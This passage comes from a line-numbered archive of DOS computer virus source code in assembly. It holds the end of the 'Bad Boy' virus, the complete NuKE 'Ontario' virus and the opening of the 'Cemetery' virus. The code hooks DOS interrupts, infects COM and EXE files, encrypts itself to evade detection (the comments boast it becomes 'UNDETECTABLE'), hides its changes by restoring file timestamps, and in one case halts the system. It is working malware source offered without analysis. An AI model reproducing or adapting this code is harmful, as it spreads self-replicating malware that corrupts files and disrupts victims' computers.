  2728.           mov    si,word ptr cs:[table+06]
  2729.           add    si,offset mod_4_cont - offset mod_4
  2730.           mov    di,cs:fsize
  2731.           add    di,offset myend+1
  2732.           push   di
  2733.           mov    cx,offset mod_5 - offset mod_4_cont
  2734.           cld
  2735.           rep    movsb
  2736.           ret
  2737. mod_4_cont:
  2738.           mov    si,cs:fsize
  2739.           add    si,100
  2740.  
  2741.           cmp    si,offset myend+1
  2742.           jnc    mod_4_cnt
  2743.           mov    si,offset myend+1
  2744. mod_4_cnt:
  2745.           mov    di,100
  2746.           mov    cx,offset myend-100
  2747.           rep    movsb
  2748.           mov    ax,100   ;
  2749.           push   ax       ; jmp 100
  2750.           ret          ;
  2751.  
  2752. ;------------- MODULE - 5 - SPECIAL PROGRAM ---------------------
  2753. mod_5:
  2754.           mov    ah,9
  2755.           mov    dx,word ptr [table+8]
  2756.           add    dx,offset msg-offset mod_5
  2757.           push   cs
  2758.           pop    ds
  2759.           int    21
  2760.           cli
  2761.           hlt
  2762.  
  2763. msg          db     0dh,0a,'The bad boy halt your system ...',7,7,'$'
  2764.  
  2765. ;------------- MODULE - 6 - INT 24 HEADER -----------------------
  2766. mod_6:
  2767.           mov    al,3
  2768.           iret
  2769.           db     'The Bad Boy virus, Copyright (C) 1991.',0
  2770.  
  2771. ;------------- MODULE - 7 - INT 21 HEADER -----------------------
  2772. mod_7:
  2773.           push   bx
  2774.           push   si
  2775.           push   di
  2776.           push   es
  2777.           push   ax
  2778.  
  2779.           cmp    ax,4b00
  2780.           je     mod_7_begin
  2781.           jmp    mod_7_exit
  2782. mod_7_begin:
  2783.           push   ds
  2784.           push   cs                    ;
  2785.           pop    es                    ;
  2786.           xor    ax,ax                   ;
  2787.           mov    ds,ax                   ;
  2788.           mov    si,4*24                   ;
  2789.           mov    di,offset oldint24            ;
  2790.           movsw                       ;   change int24 vector
  2791.           movsw                       ;
  2792.           mov    ax,word ptr cs:[table+0a]           ;
  2793.           cli                       ;
  2794.           mov    ds:[4*24],ax               ;
  2795.           mov    ax,cs                   ;
  2796.           mov    ds:[4*24+2],ax               ;
  2797.           sti
  2798.           pop    ds
  2799.  
  2800.           mov    ax,3d00                   ;
  2801.           pushf                       ;
  2802.           call   cs:oldint21               ;
  2803.           jc     mod_7_ex                   ; open,infect,close file
  2804.           mov    bx,ax                   ;
  2805. mod_7_infect:                           ;
  2806.           call   word ptr cs:[table+0e]           ;
  2807.           pushf
  2808.           mov    ah,3e                   ;
  2809.           pushf                       ;
  2810.           call   cs:oldint21               ;
  2811.           popf
  2812.           jc     mod_7_ex
  2813.  
  2814.           push   ds              ;
  2815.           cli                 ;
  2816.           xor    ax,ax             ;
  2817.           mov    ds,ax             ;
  2818.           mov    ax,word ptr cs:[oldint13]     ;
  2819.           xchg   ax,word ptr ds:[4*13]     ;
  2820.           mov    word ptr cs:[oldint13],ax     ; exchange int13 vectors
  2821.           mov    ax,word ptr cs:[oldint13+2] ;
  2822.           xchg   ax,word ptr ds:[4*13+2]     ;
  2823.           mov    word ptr cs:[oldint13+2],ax ;
  2824.           sti                 ;
  2825.           pop    ds              ;
  2826. mod_7_ex:
  2827.           push   ds                    ;
  2828.           xor    ax,ax                   ;
  2829.           mov    ds,ax                   ;
  2830.           mov    ax,word ptr cs:oldint24           ;
  2831.           mov    ds:[4*24],ax               ;
  2832.           mov    ax,word ptr cs:oldint24+2           ; restore int24 vector
  2833.           mov    ds:[4*24+2],ax               ;
  2834.           pop    ds                    ;
  2835.  
  2836. mod_7_exit:
  2837.           pop    ax
  2838.           pop    es
  2839.           pop    di
  2840.           pop    si
  2841.           pop    bx
  2842.  
  2843.           jmp    cs:oldint21
  2844.  
  2845. ;------------- MODULE - 8 - INFECTING (bx - file handle) --------
  2846. mod_8:
  2847.           push   cx
  2848.           push   dx
  2849.           push   ds
  2850.           push   es
  2851.           push   di
  2852.           push   bp
  2853.  
  2854.           push   bx
  2855.           mov    ax,1220
  2856.           int    2f
  2857.           mov    bl,es:[di]
  2858.           xor    bh,bh
  2859.           mov    ax,1216
  2860.           int    2f
  2861.           pop    bx
  2862.  
  2863.           mov    ax,word ptr es:[di+11]
  2864.           cmp    ax,0f000
  2865.           jc     mod_8_c
  2866.           jmp    mod_8_exit
  2867.  
  2868. mod_8_c:
  2869.           mov    word ptr es:[di+2],2           ;open mode - R/W
  2870.  
  2871.           mov    ax,es:[di+11]
  2872.           mov    cs:fsize,ax           ; save file size
  2873.  
  2874.           mov    ax,word ptr es:[di+0dh]   ;
  2875.           mov    word ptr cs:[ftime],ax    ; save file date/time
  2876.           mov    ax,word ptr es:[di+0f]    ;
  2877.           mov    word ptr cs:[fdate],ax    ;
  2878.  
  2879.           push   cs              ;
  2880.           pop    ds              ;
  2881.           mov    dx,offset myend+1         ;
  2882.           mov    cx,offset myend-100     ; read first bytes
  2883.           mov    ah,3f             ;
  2884.           pushf
  2885.           call   cs:oldint21
  2886.           jnc    mod_8_cnt
  2887.           jmp    mod_8_exit
  2888.  
  2889. mod_8_cnt:
  2890.           mov    bp,ax             ; ax - bytes read
  2891.           mov    si,dx
  2892.           mov    ax,'MZ'
  2893.           cmp    ax,word ptr ds:[si]
  2894.           jne    mod_8_nxtchk
  2895.           jmp    mod_8_exit
  2896. mod_8_nxtchk:
  2897.           xchg   ah,al
  2898.           cmp    ax,ds:[si]
  2899.           jne    mod_8_cnt2
  2900.           jmp    mod_8_exit
  2901.  
  2902. mod_8_cnt2:
  2903.           push   es
  2904.           push   di
  2905.           push   cs              ;
  2906.           pop    es              ;
  2907.           mov    si,100             ;
  2908.           mov    di,dx             ; check for infected file
  2909.           mov    cx,0bh             ;
  2910.           repe   cmpsb             ;
  2911.           pop    di
  2912.           pop    es
  2913.           jne    mod_8_cnt1          ;
  2914.           jmp    mod_8_exit
  2915. mod_8_cnt1:
  2916.           mov    word ptr es:[di+15],0     ; fp:=0
  2917.  
  2918.           push   es
  2919.           push   di
  2920.           mov    si,word ptr cs:[table+0e]
  2921.           add    si,offset mod_8_cont - offset mod_8
  2922.           xor    di,di
  2923.           push   cs
  2924.           pop    es
  2925.           mov    cx,offset mod_8_cont_end - offset mod_8_cont
  2926.           cld
  2927.           rep    movsb
  2928.           pop    di
  2929.           pop    es
  2930.  
  2931.           mov    si,word ptr cs:[table+0e]
  2932.           add    si,offset mod_8_cont_end - offset mod_8
  2933.           push   si
  2934.           xor    si,si
  2935.           push   si
  2936.  
  2937.           push   ds              ;
  2938.           cli                 ;
  2939.           xor    ax,ax             ;
  2940.           mov    ds,ax             ;
  2941.           mov    ax,word ptr cs:[oldint13]     ;
  2942.           xchg   ax,word ptr ds:[4*13]     ;
  2943.           mov    word ptr cs:[oldint13],ax     ;
  2944.           mov    ax,word ptr cs:[oldint13+2] ; exchange int13 vectors
  2945.           xchg   ax,word ptr ds:[4*13+2]     ;
  2946.           mov    word ptr cs:[oldint13+2],ax ;
  2947.           sti                 ;
  2948.           pop    ds              ;
  2949.  
  2950.           ret
  2951.  
  2952. mod_8_cont:
  2953.           push   bx
  2954.           call   word ptr cs:[table]     ; code virus
  2955.           pop    bx
  2956.  
  2957.           mov    dx,100             ;
  2958.           mov    ah,40             ; write code in begin
  2959.           mov    cx,offset myend-0ff
  2960.           pushf                 ;
  2961.           call   cs:stdint21         ;
  2962.  
  2963.           pushf
  2964.           push   bx
  2965.           call   word ptr cs:[table]     ; decode virus
  2966.           pop    bx
  2967.           popf
  2968.           jnc    mod_8_cont1
  2969.           pop    ax
  2970.           mov    ax,word ptr cs:[table+0e]
  2971.           add    ax,offset mod_8_ext - offset mod_8
  2972.           push   ax
  2973.           ret
  2974. mod_8_cont1:
  2975.           mov    ax,es:[di+11]         ; fp:=end of file
  2976.           mov    word ptr es:[di+15],ax     ;
  2977.  
  2978.           mov    dx,offset myend+1
  2979.           mov    cx,bp             ; bp - files read
  2980.           mov    ah,40             ;
  2981.           pushf                 ;
  2982.           call   cs:stdint21         ; write in end of file
  2983.  
  2984.           ret
  2985.  
  2986. mod_8_cont_end:
  2987.           mov    ax,5701     ;
  2988.           mov    cx,cs:ftime ;
  2989.           mov    dx,cs:fdate ; restore file date/time
  2990.           pushf         ;
  2991.           call   cs:oldint21 ;
  2992.  
  2993.           inc    cs:files
  2994.           cmp    cs:files,0a
  2995.           jne    mod_8_ext
  2996.           call   word ptr cs:[table+8]
  2997.           jmp    short mod_8_ext
  2998. mod_8_exit:
  2999.           stc
  3000.           jmp    short mod_8_ex
  3001. mod_8_ext:
  3002.           clc
  3003. mod_8_ex:
  3004.           pop    bp
  3005.           pop    di
  3006.           pop    es
  3007.           pop    ds
  3008.           pop    dx
  3009.           pop    cx
  3010.           ret
  3011.  
  3012. ;---------------------------------------------------------------
  3013.  
  3014. myend          db   0
  3015.  
  3016.           int    20            ;code of infected file
  3017.  
  3018. false_mod_1:
  3019.           mov     word ptr cs:[table],offset mod_1
  3020.           ret
  3021.  
  3022. code          ends
  3023.           end  start
  3024.  
  3025. done
  3026.  
  3027.  
  3028.  
  3029. virus       segment byte public
  3030.             assume  cs:virus, ds:virus
  3031.  
  3032.             org     100h                    ;Guess its a COM File huh?
  3033. ont         proc    far
  3034.  
  3035. start:
  3036.             jmp     go4it                   ;Jump to beginning of the
  3037.             db      1Dh                     ;Virus And start!
  3038.             db      'fected [NuKE]''92', 0Dh, 0Ah, '$'
  3039.             mov     dx,0102h        ;This is the small File the Virus
  3040.             mov     ah,09h          ;is infected to! As you see it only
  3041.             int     21h             ;displays that messages and exits
  3042.             int     20h             ;Exit Command for COMs
  3043. go4it:
  3044.             nop
  3045.             call    decrypt         ;Get Decryption value & Decrypt viri
  3046.             call    virus_start     ;Start the Virus!
  3047. ont         endp
  3048.  
  3049. ;---------------------------------------------------------------------;
  3050. ;                   The Start of the Virus Code                       ;
  3051. ;---------------------------------------------------------------------;
  3052.  
  3053. virus_start           proc    near
  3054.             pop     bp
  3055.             sub     bp,7
  3056.             mov     ax,0FFFFh             ;Is Virus in Memory hooked on?
  3057.             int     21h                     ;the Int 21h?
  3058.             or      ah,ah                   ;
  3059.             jz      bye_bye                 ;Yes it is... Quit then...
  3060.             push    ds
  3061.             xor     ax,ax
  3062.             mov     ds,ax
  3063.             sub     word ptr ds:413h,2
  3064.             lds     bx,dword ptr ds:84h
  3065.             mov     word ptr cs:[200h][bp],bx
  3066.             mov     word ptr cs:[202h][bp],ds
  3067.             mov     bx,es
  3068.             dec     bx
  3069.             mov     ds,bx
  3070.             sub     word ptr ds:3,80h
  3071.             mov     ax,ds:12h
  3072.             sub     ax,80h
  3073.             mov     ds:12h,ax
  3074.             mov     es,ax
  3075.             push    cs
  3076.             pop     ds
  3077.             mov     si,bp
  3078.             xor     di,di
  3079.             mov     cx,204h
  3080.             cld
  3081.             rep     movsb
  3082.             mov     ds,cx
  3083.             cli                             ;This is where we hook the
  3084.             mov     word ptr ds:84h,7Fh     ;virus to the Int21h
  3085.             mov     word ptr ds:84h+2,ax
  3086.             sti
  3087.             mov     ax,4BFFh
  3088.             int     21h
  3089.             pop     ds
  3090.             push    ds
  3091.             pop     es
  3092. bye_bye:
  3093.             or      bp,bp
  3094.             jz      what
  3095.             lea     si,[bp+7Bh]
  3096.             nop
  3097.             mov     di,offset ds:[100h]
  3098.             push    di
  3099.             cld
  3100.             movsw
  3101.             movsw
  3102.             retn
  3103. what:
  3104.             mov     ax,es
  3105.             add     cs:7dh,ax
  3106. ;*          jmp     far ptr go4it7
  3107. virus_start           endp
  3108.             db      0EAh,0EBh, 15h, 49h, 6Eh
  3109.             cmp     ax,0FFFFh
  3110.             jne     new_21h
  3111.             inc     ax
  3112.             iret
  3113. ;---------------------------------------------------------------------;
  3114. ;                     Interrupt 21h handler                           ;
  3115. ;---------------------------------------------------------------------;
  3116. new_21h:
  3117.            cmp     ah,4Bh        ;Test, is File beginning Executed!
  3118.            jne     leave_ok      ;Nope! Call Int21!
  3119.            cmp     al,3          ;Overlay, beginning execute?
  3120.            je      leave_ok      ;Yes! Leave it alone
  3121.            cmp     al,0FFh       ;Virus testing to see if its alive?
  3122.            jne     do_it_man     ;in memory?
  3123.            push    cs
  3124.            pop     ds
  3125.            mov     dx,1DDh
  3126.            call    infect
  3127.            iret
  3128. do_it_man:
  3129.            call    infect       ;Infect file dude...
  3130. leave_ok:
  3131.            jmp     dword ptr cs:[200h]  ;Int21 handler..
  3132.  
  3133. ;---------------------------------------------------------------------;
  3134. ;              Infection Routine for the Ontario Virus                ;
  3135. ;---------------------------------------------------------------------;
  3136.  
  3137. infect     proc    near
  3138.            push    es
  3139.            push    ds              ;Save them not to fuck things up..
  3140.            push    dx
  3141.            push    cx
  3142.            push    bx
  3143.            push    ax
  3144.            mov     ax,4300h        ;Here we get the file attribute
  3145.            call    int21           ;for file to be infected.
  3146.            jc      outta           ;Bitch Error encountered. Quit!
  3147.            test    cl,1            ;Test if its Read-Only!
  3148.            jz      attrib_ok       ;Ok, it ain't Read-Only Continue!
  3149.            and     cl,0FEh         ;Set Read-Only to normal Attribs
  3150.            mov     ax,4301h        ;Call Ints to do it...
  3151.            call    int21           ;Bingo! Done!
  3152.            jc      outta           ;Error encountered? Split if yes!
  3153. attrib_ok:
  3154.            mov     ax,3D02h        ;Open file for Read/Write
  3155.            call    int21           ;Call Interrupt to do it!
  3156.            jnc     open_ok         ;no errors? Continue!
  3157. outta:
  3158.            jmp     go4it5          ;Hey, Split Man... Errors happened!
  3159. open_ok:
  3160.            mov     bx,ax           ;BX=File Handle
  3161.            push    cs
  3162.            pop     ds
  3163.            mov     ax,5700h        ;Get File's Date & Time
  3164.            call    int21           ;Do it!
  3165.            mov     word ptr ds:[204h],cx  ;Save Time
  3166.            mov     word ptr ds:[206h],dx  ;Save Date
  3167.            mov     dx,208h         ;DX=Pointer
  3168.            mov     cx,1Bh          ;CX=Number of Btyes
  3169.            mov     ah,3Fh          ;Read From File
  3170.            call    int21           ;Do It!
  3171.            jc      go4it1          ;Errors? Quit if yes!
  3172.            cmp     word ptr ds:[208h],5A4Dh ;Check if files already
  3173.            je      go4it0                   ;infected.
  3174.            mov     al,byte ptr ds:[209h]   ;Com , Exes...
  3175.            cmp     al,byte ptr ds:[20Bh]
  3176.            je      go4it1
  3177.            xor     dx,dx
  3178.            xor     cx,cx
  3179.            mov     ax,4202h
  3180.            call    int21           ;Move File pointer to end of
  3181.            jc      go4it1          ;file to be infected.
  3182.            cmp     ax,0E000h       ;File bigger than E000 bytes?
  3183.            ja      go4it1          ;Error...
  3184.            push    ax              ;Save File Length
  3185.            mov     ax,word ptr ds:[208h]
  3186.            mov     ds:7bh,ax
  3187.            mov     ax,word ptr ds:[20Ah]
  3188.            mov     ds:7dh,ax
  3189.            pop     ax                       ;All this is, is a complex
  3190.            sub     ax,3                     ;way to do "JMP"
  3191.            mov     byte ptr ds:[208h],0E9h  ;
  3192.            mov     word ptr ds:[209h],ax
  3193.            mov     byte ptr ds:[20Bh],al
  3194.            jmp     short go4it3             ;File READY Infect it!
  3195.            db      90h                      ;NOP me... detection string?
  3196. go4it0:
  3197.            cmp     word ptr ds:[21Ch],1
  3198.            jne     go4it2
  3199. go4it1:
  3200.            jmp     go4it4
  3201. go4it2:
  3202.            mov     ax,word ptr ds:[20Ch]
  3203.            mov     cx,200h
  3204.            mul     cx
  3205.            push    ax
  3206.            push    dx
  3207.            mov     cl,4
  3208.            ror     dx,cl
  3209.            shr     ax,cl
  3210.            add     ax,dx
  3211.            sub     ax,word ptr ds:[210h]
  3212.            push    ax
  3213.            mov     ax,word ptr ds:[21Ch]
  3214.            mov     ds:7bh,ax
  3215.            mov     ax,word ptr ds:[21Eh]
  3216.            add     ax,10h
  3217.            mov     ds:7dh,ax
  3218.            pop     ax                      ; This is continues with the
  3219.            mov     word ptr ds:[21Eh],ax   ; above to put a JMP at the
  3220.            mov     word ptr ds:[21Ch],1    ; beginning of the file!
  3221.            inc     word ptr ds:[20Ch]      ;
  3222.            pop     cx                      ;
  3223.            pop     dx                      ;
  3224.            mov     ax,4200h                ;
  3225.            call    int21
  3226.            jc      go4it4
  3227. go4it3:
  3228.            xor     byte ptr ds:[1F8h],8   ;
  3229.            xor     ax,ax                  ; Theses Lines copy the
  3230.            mov     ds,ax                  ; virus code else where
  3231.            mov     al,ds:46Ch             ; in memory to get it
  3232.            push    cs                     ; ready to infect the file
  3233.            pop     ds                     ; as we must encrypt it
  3234.            push    cs                     ; FIRST when we infect the
  3235.            pop     es                     ; file. so we'll encrypt
  3236.            mov     byte ptr ds:[1ECh],al  ; this copy we're making!
  3237.            xor     si,si                  ; and append that to the
  3238.            mov     di,offset ds:[224h]    ; end of the file
  3239.            push    di                     ;
  3240.            mov     cx,200h                ;
  3241.            cld                            ;
  3242.            rep     movsb
  3243.            mov     si,offset ds:[228h]    ;Now Encrpyt that copy of the
  3244.            call    encrypt_decrypt        ;virus we just made...
  3245.            pop     dx
  3246.            mov     cx,200h                ;Write Virus to file!
  3247.            mov     ah,40h                 ;BX=Handle, CX=Bytes
  3248.            call    int21                  ;DX=pointer to write buffer
  3249.            jc      go4it4            ;Duh? Check for errors!
  3250.            xor     cx,cx
  3251.            xor     dx,dx                  ;Now move pointer to beginning
  3252.            mov     ax,4200h               ;of file.
  3253.            call    int21
  3254.            jc      go4it4            ;Duh? Check for errors!
  3255.            mov     dx,208h                ;Write to file!
  3256.            mov     cx,1Bh                 ;CX=Bytes
  3257.            mov     ah,40h                 ;DX=pointes to buffer
  3258.            call    int21             ;Bah, HumBug
  3259. go4it4:
  3260.            mov     dx,word ptr ds:[206h]  ;Leave no tracks...
  3261.            mov     cx,word ptr ds:[204h]  ; puts back File TIME
  3262.            mov     ax,5701h               ; and DATE! on file...
  3263.            call    int21                  ;
  3264.            mov     ah,3Eh                 ;
  3265.            call    int21             ;Bah, HumBug...
  3266. go4it5:
  3267.            pop     ax                     ;Get lost...
  3268.            pop     bx
  3269.            pop     cx
  3270.            pop     dx
  3271.            pop     ds
  3272.            pop     es
  3273.            retn
  3274. infect     endp
  3275.  
  3276. ;----------------------------------------------------------------------;
  3277. ;                 The Original Interrupt 21h handler                   ;
  3278. ;----------------------------------------------------------------------;
  3279.  
  3280. int21      proc    near
  3281.            pushf                       ;Fake an Int Call...
  3282.  
  3283.            call    dword ptr cs:[200h] ;Orignal Int21h Handler
  3284.            retn
  3285. int21      endp
  3286.  
  3287.            db      'C:\COMMAND.COM'
  3288.            db       00h, 84h
  3289.  
  3290. ;---------------------------------------------------------------------;
  3291. ;            The Simple, But VERY Effective Encryption Routine        ;
  3292. ;---------------------------------------------------------------------;
  3293.  
  3294. decrypt    proc    near
  3295.            pop     si
  3296.            push    si
  3297.            mov     al,byte ptr cs:[1E8h][si];INCRYPTION VALUE TO CHANGE!
  3298. encrypt_decrypt:                         ;and Virus will be UNDETECTABLE
  3299.            mov     cx,1E8h            ; LENGTH OF VIRII! Change this!
  3300. loop_me:   not     al                 ; if you modief the virus!
  3301.            xor     cs:[si],al         ;
  3302.            inc     si                 ;
  3303.            loop    loop_me            ;
  3304.                                       ;
  3305.            retn
  3306. decrypt    endp
  3307.  
  3308.  
  3309. virus      ends
  3310.            end     start
  3311.  
  3312. ;------------------------------------------------------------------------
  3313.  
  3314. done
  3315.  
  3316. ;██████████████████████████████████████████████████████████████████████████
  3317. ;██                                         ██
  3318. ;██                    CEMETERY                     ██
  3319. ;██                                         ██
  3320. ;██      Created:   4-Mar-91                             ██
  3321. ;██                                         ██
  3322. ;██████████████████████████████████████████████████████████████████████████
  3323.   
  3324. data_1e        equ    4Ch                ; (0000:004C=31h)
  3325. data_2e        equ    4Eh                ; (0000:004E=70h)
  3326. data_3e        equ    70h                ; (0000:0070=0FF33h)
  3327. data_4e        equ    72h                ; (0000:0072=0F000h)
  3328. data_5e        equ    84h                ; (0000:0084=0E3h)
  3329. data_6e        equ    86h                ; (0000:0086=161Ah)
  3330. data_7e        equ    90h                ; (0000:0090=8Eh)
  3331. data_8e        equ    92h                ; (0000:0092=1498h)
  3332. data_9e        equ    102h                ; (0000:0102=0CC00h)
  3333. data_10e    equ    106h                ; (0000:0106=326h)
  3334. data_11e    equ    450h                ; (0000:0450=184Fh)
  3335. data_12e    equ    46Ch                ; (0000:046C=0C4BCh)
  3336. data_13e    equ    46Eh                ; (0000:046E=10h)
  3337. data_14e    equ    47Bh                ; (0000:047B=0)
  3338. data_15e    equ    0                ; (0326:0000=6A7h)
  3339. data_16e    equ    2                ; (0326:0002=70h)
  3340. data_17e    equ    0                ; (0687:0000=81h)
  3341. data_18e    equ    1                ; (0688:0001=0FF17h)
  3342. data_19e    equ    2                ; (06E3:0002=2342h)
  3343. data_20e    equ    6                ; (06E3:0006=2344h)
  3344. data_46e    equ    0FBF0h                ; (701E:FBF0=0)
  3345. data_47e    equ    0FBF2h                ; (701E:FBF2=0)
  3346. data_48e    equ    0FC10h                ; (701E:FC10=0)
  3347. data_49e    equ    0FC12h                ; (701E:FC12=0)
  3348. data_50e    equ    0FC14h                ; (701E:FC14=0)
  3349. data_51e    equ    0FC1Eh                ; (701E:FC1E=0)
  3350. data_52e    equ    0FC20h                ; (701E:FC20=0)
  3351. data_53e    equ    0FC26h                ; (701E:FC26=0)
  3352. data_54e    equ    0FC28h                ; (701E:FC28=0)
  3353.   
  3354. code_seg_a    segment
  3355.         assume    cs:code_seg_a, ds:code_seg_a
  3356.   
  3357.   
  3358.         org    100h
  3359.   
  3360. cemetery    proc    far
  3361.   
  3362. start:
  3363. data_21        dw    0CE9h
  3364. data_22        dw    0C304h
  3365.         db    23 dup (0C3h)
  3366.         db    'CEMETERY'
  3367. data_24        dw    0C3C3h
  3368. data_25        dw    0C3C3h
  3369. data_26        dw    0
  3370. data_27        dw    0
  3371. data_28        dw    0
  3372. data_29        dw    0
  3373. data_30        dw    0
  3374. data_31        dd    00000h
  3375. data_32        dw    0
  3376. data_33        dw    0
  3377. data_34        dd    00000h
  3378. data_35        dw    0
  3379. data_36        dw    0
  3380.         db    68h, 0E8h, 55h, 3, 90h, 3Dh
  3381.         db    4Dh, 4Bh, 75h, 9, 55h, 8Bh
  3382.         db    0ECh, 83h, 66h, 6, 0FEh, 5Dh
  3383.         db    0CFh, 80h, 0FCh, 4Bh, 74h, 12h
  3384.         db    3Dh, 0, 3Dh, 74h, 0Dh, 3Dh
  3385.         db    0, 6Ch, 75h, 5, 80h, 0FBh
  3386.         db    0, 74h, 3
  3387. loc_1:
  3388.         jmp    loc_13
  3389. loc_2:
  3390.         push    es
  3391.         push    ds
  3392.         push    di
  3393.         push    si
  3394.         push    bp
  3395.         push    dx
  3396.         push    cx
  3397.         push    bx
  3398.         push    ax
  3399.         call    sub_6
  3400.         call    sub_7
  3401.         cmp    ax,6C00h
  3402.         jne    loc_3                ; Jump if not equal
  3403.         mov    dx,si
  3404. loc_3:
  3405.         mov    cx,80h
  3406.         mov    si,dx
  3407.   
  3408. locloop_4:
  3409.         inc    si
  3410.         mov    al,[si]
  3411.         or    al,al                ; Zero ?
  3412.         loopnz    locloop_4            ; Loop if zf=0, cx>0
  3413.   
  3414.         sub    si,2
  3415.         cmp    word ptr [si],4D4Fh
  3416.         je    loc_7                ; Jump if equal
  3417.         cmp    word ptr [si],4558h
  3418.         je    loc_6                ; Jump if equal
  3419. loc_5:
  3420.         jmp    short loc_12
  3421.         db    90h
  3422. loc_6:
  3423.         cmp    word ptr [si-2],452Eh
  3424.         nop
  3425.         jz    loc_8                ; Jump if zero
  3426.         jmp    short loc_5
  3427. loc_7:
  3428.         cmp    word ptr [si-2],432Eh
  3429.         jne    loc_5                ; Jump if not equal
  3430.         cmp    word ptr [si-4],444Eh
  3431.         jne    loc_5                ; Jump if not equal
  3432. loc_8:
  3433.         mov    ax,3D02h
  3434.         call    sub_5
  3435.         jc    loc_12                ; Jump if carry Set
  3436.         mov    bx,ax
  3437.         mov    ax,5700h
  3438.         call    sub_5
  3439.         mov    cs:data_27,cx            ; (701E:0129=0)
  3440.         mov    cs:data_28,dx            ; (701E:012B=0)
  3441.         mov    ax,4200h
  3442.         xor    cx,cx                ; Zero register
  3443.         xor    dx,dx                ; Zero register
  3444.         call    sub_5
  3445.         push    cs
  3446.         pop    ds
  3447.         mov    dx,103h
  3448.         mov    si,dx
  3449.         mov    cx,18h
  3450.         mov    ah,3Fh                ; '?'
  3451.         call    sub_5
  3452.         jc    loc_10                ; Jump if carry Set
  3453.         cmp    word ptr [si],5A4Dh
  3454.         jne    loc_9                ; Jump if not equal
  3455.         call    sub_1
  3456.         jmp    short loc_10
  3457. loc_9:
  3458.         call    sub_4
  3459. loc_10:
  3460.         jc    loc_11                ; Jump if carry Set
  3461.         mov    ax,5701h
  3462.         mov    cx,cs:data_27            ; (701E:0129=0)
  3463.         mov    dx,cs:data_28            ; (701E:012B=0)
  3464.         call    sub_5
  3465. loc_11:
  3466.         mov    ah,3Eh                ; '>'
  3467.         call    sub_5
  3468. loc_12:
  3469.         call    sub_7
  3470.         pop    ax
  3471.         pop    bx
  3472.         pop    cx
  3473.         pop    dx
  3474.         pop    bp
  3475.         pop    si
  3476.         pop    di
  3477.         pop    ds
  3478.         pop    es
  3479. loc_13:
  3480.         jmp    cs:data_31            ; (701E:0131=0)
  3481.   
  3482. cemetery    endp
  3483.   
  3484. ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  3485. ;                   SUBROUTINE
  3486. ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  3487.   
  3488. sub_1        proc    near
  3489.         mov    cx,[si+16h]
  3490.         add    cx,[si+8]
  3491.         mov    ax,10h
  3492.         mul    cx                ; dx:ax = reg * ax
  3493.         add    ax,[si+14h]
  3494.         adc    dx,0
  3495.         push    dx
  3496.         push    ax
  3497.         mov    ax,4202h
  3498.         xor    cx,cx                ; Zero register
  3499.         xor    dx,dx                ; Zero register
  3500.         call    sub_5
  3501.         cmp    dx,0
  3502.         jne    loc_14                ; Jump if not equal
  3503.         cmp    ax,589h
  3504.         jae    loc_14                ; Jump if above or =
  3505.         pop    ax
  3506.         pop    dx
  3507.         stc                    ; Set carry flag
  3508.         ret
  3509. loc_14:
  3510.         mov    di,ax
  3511.         mov    bp,dx
  3512.         pop    cx
  3513.         sub    ax,cx
  3514.         pop    cx
  3515.         sbb    dx,cx
  3516.         cmp    word ptr [si+0Ch],0
  3517.         je    loc_ret_17            ; Jump if equal
  3518.         cmp    dx,0
  3519.         jne    loc_15                ; Jump if not equal
  3520.         cmp    ax,589h
  3521.         jne    loc_15                ; Jump if not equal
  3522.         stc                    ; Set carry flag
  3523.         ret
  3524. loc_15:
  3525.         mov    dx,bp
  3526.         mov    ax,di
  3527.         push    dx
  3528.         push    ax
  3529.         add    ax,589h
  3530.         adc    dx,0
  3531.         mov    cx,200h
  3532.         div    cx                ; ax,dx rem=dx:ax/reg
  3533.         les    di,dword ptr [si+2]        ; Load 32 bit ptr
  3534.         mov    cs:data_29,di            ; (701E:012D=0)
  3535.         mov    cs:data_30,es            ; (701E:012F=0)
  3536.         mov    [si+2],dx
  3537.         cmp    dx,0
  3538.         je    loc_16                ; Jump if equal
  3539.         inc    ax
  3540. loc_16:
  3541.         mov    [si+4],ax
  3542.         pop    ax
  3543.         pop    dx
  3544.         call    sub_2
  3545.         sub    ax,[si+8]
  3546.         les    di,dword ptr [si+14h]        ; Load 32 bit ptr
  3547.         mov    data_24,di            ; (701E:0123=0C3C3h)
  3548.         mov    data_25,es            ; (701E:0125=0C3C3h)
  3549.         mov    [si+14h],dx
  3550.         mov    [si+16h],ax
  3551.         mov    word ptr data_26,ax        ; (701E:0127=0)
  3552.         mov    ax,4202h
  3553.         xor    cx,cx                ; Zero register
  3554.         xor    dx,dx                ; Zero register
  3555.         call    sub_5
  3556.         call    sub_3
  3557.         jc    loc_ret_17            ; Jump if carry Set
  3558.         mov    ax,4200h
  3559.         xor    cx,cx                ; Zero register
  3560.         xor    dx,dx                ; Zero register
  3561.         call    sub_5
  3562.         mov    ah,40h                ; '@'
  3563.         mov    dx,si
  3564.         mov    cx,18h
  3565.         call    sub_5
  3566.   
  3567. loc_ret_17:
  3568.         ret
  3569. sub_1        endp
  3570.   
  3571.   
  3572. ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  3573. ;                   SUBROUTINE
  3574. ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  3575.   
  3576. sub_2        proc    near
  3577.         mov    cx,4
  3578.         mov    di,ax
  3579.         and    di,0Fh
  3580.   
  3581. locloop_18:
  3582.         shr    dx,1                ; Shift w/zeros fill
  3583.         rcr    ax,1                ; Rotate thru carry
  3584.         loop    locloop_18            ; Loop if cx > 0
  3585.   
  3586.         mov    dx,di
  3587.         ret
  3588. sub_2        endp
  3589.   
  3590.   
